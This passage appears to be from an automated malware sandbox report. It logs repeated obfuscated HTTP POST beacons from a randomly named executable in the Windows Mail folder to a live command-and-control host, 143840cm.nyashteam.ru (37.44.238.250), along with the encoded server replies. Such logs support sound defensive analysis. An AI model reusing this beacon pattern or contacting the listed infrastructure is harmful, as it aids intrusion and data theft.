Nov 25, 2024 22:37:53.914763927 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:37:54.270436049 CET	1048	OUT	Data Raw: 5f 5f 5a 5c 5d 5e 55 53 59 59 54 56 57 50 55 5a 58 5d 5b 53 59 5d 56 40 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: __Z\]^USYYTVWPUZX][SY]V@ZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV '32Z?)(3% [1&6!4,/8(((,?!:-,\*?^?.&\%#P-
Nov 25, 2024 22:37:55.307636976 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:55.562005043 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49763	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:55.863256931 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:37:56.208956957 CET	1048	OUT	Data Raw: 5a 5d 5f 5c 5d 51 50 56 59 59 54 56 57 50 55 58 58 5e 5b 59 59 51 56 49 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z]_\]QPVYYTVWPUXX^[YYQVIZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV [33.Y+\7'6;&6#7?;#T?8?+!9&#*"?+>&\%#P-
Nov 25, 2024 22:37:57.226751089 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:57.482188940 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49765	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:57.717674017 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:37:58.067516088 CET	1048	OUT	Data Raw: 5a 5c 5f 52 5d 59 55 50 59 59 54 56 57 50 55 52 58 59 5b 58 59 58 56 44 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z\_R]YUPYYTVWPURXY[XYXVDZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV [$32Y(:7$&>!'3883S);$+:>14+&\%#P-
Nov 25, 2024 22:37:59.042995930 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:59.285012007 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49766	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:59.539345026 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:37:59.895481110 CET	1048	OUT	Data Raw: 5a 5e 5f 5b 5d 50 55 53 59 59 54 56 57 51 55 5e 58 59 5b 53 59 59 56 44 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z^_[]PUSYYTVWQU^XY[SYYVDZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#$ 1(:$ [%="8T/;);'+",%#=1+](&\%#P-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49767	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:00.132231951 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1744 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:00.489365101 CET	1744	OUT	Data Raw: 5a 5e 5f 5a 5d 5a 50 51 59 59 54 56 57 5e 55 5a 58 58 5b 52 59 50 56 46 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z^_Z]ZPQYYTVW^UZXX[RYPVFZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV 09+]35(1%6W;8(+?2%:_=*.&\%#P-0
Nov 25, 2024 22:38:01.500427008 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:01.749263048 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 26 07 20 04 2b 14 25 3d 21 0b 3d 05 33 13 26 16 2e 07 24 3d 0d 1a 21 27 22 07 27 05 2f 52 22 2f 2d 03 28 2e 2a 0f 26 3d 2e 5c 33 0b 2e 51 01 13 22 5a 21 33 2e 0b 2c 1d 01 58 25 16 0d 1a 25 1f 07 06 3c 00 37 14 22 30 31 5d 3f 0c 26 05 38 05 3c 59 2a 2b 2f 5f 38 33 2c 09 36 3f 2e 5f 08 13 23 53 2a 2c 3b 52 24 37 34 06 24 3f 3c 0b 36 2a 3d 09 24 33 21 56 23 3f 2b 5f 2b 03 02 10 23 2d 3e 11 33 03 26 5e 33 08 33 54 24 13 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: & +%=!=3&.$=!'"'/R"/-(.&=.\3.Q"Z!3.,X%%<7"01]?&8<Y+/_83,6?._#S,;R$74$?<6=$3!V#?+_+#->3&^33T$"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49768	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:00.248042107 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:00.598606110 CET	1048	OUT	Data Raw: 5f 58 5f 52 5d 59 50 57 59 59 54 56 57 50 55 5a 58 55 5b 5f 59 5d 56 42 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _X_R]YPWYYTVWPUZXU[_Y]VBZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV Z'32<9?$%;%6=!U/83+83(:]-&$]>T$+>&\%#P-
Nov 25, 2024 22:38:01.567265987 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:01.799715996 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49775	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:02.076363087 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:38:02.426750898 CET	1048	OUT	Data Raw: 5a 5e 5f 5f 5d 5d 55 57 59 59 54 56 57 5f 55 59 58 5a 5b 5c 59 5f 56 43 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z^__]]UWYYTVW_UYXZ[\Y_VCZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV %02+:?3%,&C!Z6V.($)(<Z<-.5/?!++&\%#P-
Nov 25, 2024 22:38:03.347284079 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:03.583692074 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49781	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:03.977061033 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:04.371973991 CET	1048	OUT	Data Raw: 5f 5e 5a 59 5d 5c 50 56 59 59 54 56 57 5e 55 53 58 54 5b 5d 59 59 56 46 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _^ZY]\PVYYTVW^USXT[]YYVFZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV % .[?:8]$&71C!]! ,87+#+9?1?_+&\%#P-0
Nov 25, 2024 22:38:05.315520048 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:05.570375919 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49787	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:05.811302900 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:06.161139011 CET	1048	OUT	Data Raw: 5a 5b 5f 53 58 5a 50 56 59 59 54 56 57 51 55 5f 58 5b 5b 52 59 5e 56 49 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z[_SXZPVYYTVWQU_X[[RY^VIZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV $#!?:0$&+1=[!/( (;0Y?2!:%,[?"*.&\%#P-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49788	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:06.878066063 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1744 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:07.224030972 CET	1744	OUT	Data Raw: 5a 5c 5f 58 58 5b 55 5b 59 59 54 56 57 5b 55 59 58 58 5b 5f 59 5a 56 46 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z\_XX[U[YYTVW[UYXX[_YZVFZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#$9(([&& Z'5#'<R,T)8 (1.9&/??.&\%#P-$
Nov 25, 2024 22:38:08.194628000 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:08.437388897 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 25 5f 21 3e 37 19 27 13 32 1c 3d 05 23 5e 32 06 0f 5b 25 2d 06 40 36 34 29 5b 30 5a 2b 50 37 2f 31 01 28 58 32 0d 24 10 31 01 24 31 2e 51 01 13 21 07 21 30 3d 1c 3b 33 2c 01 25 28 27 1b 31 0f 39 02 28 2e 2f 19 23 30 3e 04 3f 0c 22 04 3b 12 2f 03 2b 2b 28 06 2c 23 33 14 22 2f 2e 5f 08 13 20 0f 2a 3f 02 0d 33 37 11 1d 32 02 27 1c 21 2a 3d 09 25 30 22 0f 35 3c 3b 5c 3f 04 30 5b 36 3e 25 0d 30 03 03 03 24 21 34 08 24 03 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: %_!>7'2=#^2[%-@64)[0Z+P7/1(X2$1$1.Q!!0=;3,%('19(./#0>?";/++(,#3"/._ ?372'!=%0"5<;\?0[6>%0$!4$"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49789	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:07.573131084 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:07.926800966 CET	1048	OUT	Data Raw: 5a 58 5f 5a 58 5c 55 55 59 59 54 56 57 59 55 5e 58 59 5b 5a 59 5e 56 43 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZX_ZX\UUYYTVWYU^XY[ZY^VCZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#0#!<*'367&5=]"''88?)(<X?"!.6,_)?_<>&\%#P-,
Nov 25, 2024 22:38:08.919553041 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:09.165026903 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49795	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:09.403892040 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:38:09.758265018 CET	1048	OUT	Data Raw: 5f 58 5a 5f 58 5b 50 52 59 59 54 56 57 50 55 5a 58 5d 5b 5a 59 5c 56 44 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _XZ_X[PRYYTVWPUZX][ZY\VDZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#%3"+9;$S([&C1Z!$ W/?S?("=:&/)2?\+>&\%#P-
Nov 25, 2024 22:38:10.720138073 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:10.969686985 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49801	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:11.217164040 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:38:11.567393064 CET	1048	OUT	Data Raw: 5f 5e 5f 5b 5d 5c 55 5a 59 59 54 56 57 51 55 5f 58 5a 5b 53 59 5e 56 41 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _^_[]\UZYYTVWQU_XZ[SY^VAZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#'3"Z(('5$X2%"60/;;+;$("Y-5#>2;]+.&\%#P-
Nov 25, 2024 22:38:12.580275059 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:12.834297895 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49807	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:13.280944109 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49808	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:13.563854933 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1732 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:13.911257029 CET	1732	OUT	Data Raw: 5a 5e 5f 53 5d 5a 50 50 59 59 54 56 57 58 55 5d 58 5d 5b 58 59 5d 56 40 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z^_S]ZPPYYTVWXU]X][XY]V@ZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#30.X??3_%C."<S/;$(;[<T!.6<_)+>&\%#P-0
Nov 25, 2024 22:38:14.926454067 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:15.216677904 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 26 06 34 2d 24 0e 24 03 04 56 3e 05 30 06 24 38 3d 5a 25 3d 09 18 22 1a 2a 06 33 3f 28 09 22 2c 32 5a 28 3e 2e 0e 26 2d 3d 01 27 31 2e 51 01 13 22 13 35 0d 03 1f 38 33 28 00 32 28 0a 45 32 21 22 5b 2a 3d 27 57 23 20 39 5b 28 22 2e 00 2c 2c 24 5d 3d 3b 33 5f 38 30 3f 14 35 3f 2e 5f 08 13 20 0c 29 01 23 54 24 19 20 00 31 3f 3f 57 21 04 3a 52 24 0d 29 1d 21 05 37 5f 29 3d 3c 1e 23 2e 3e 1e 24 3d 21 05 24 57 3f 51 27 29 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: &4-$$V>0$8=Z%="3?(",2Z(>.&-='1.Q"583(2(E2!"[='W# 9[(".,,$]=;3_80?5?._ )#T$ 1??W!:R$)!7_)=<#.>$=!$W?Q')"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49809	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:13.693063974 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
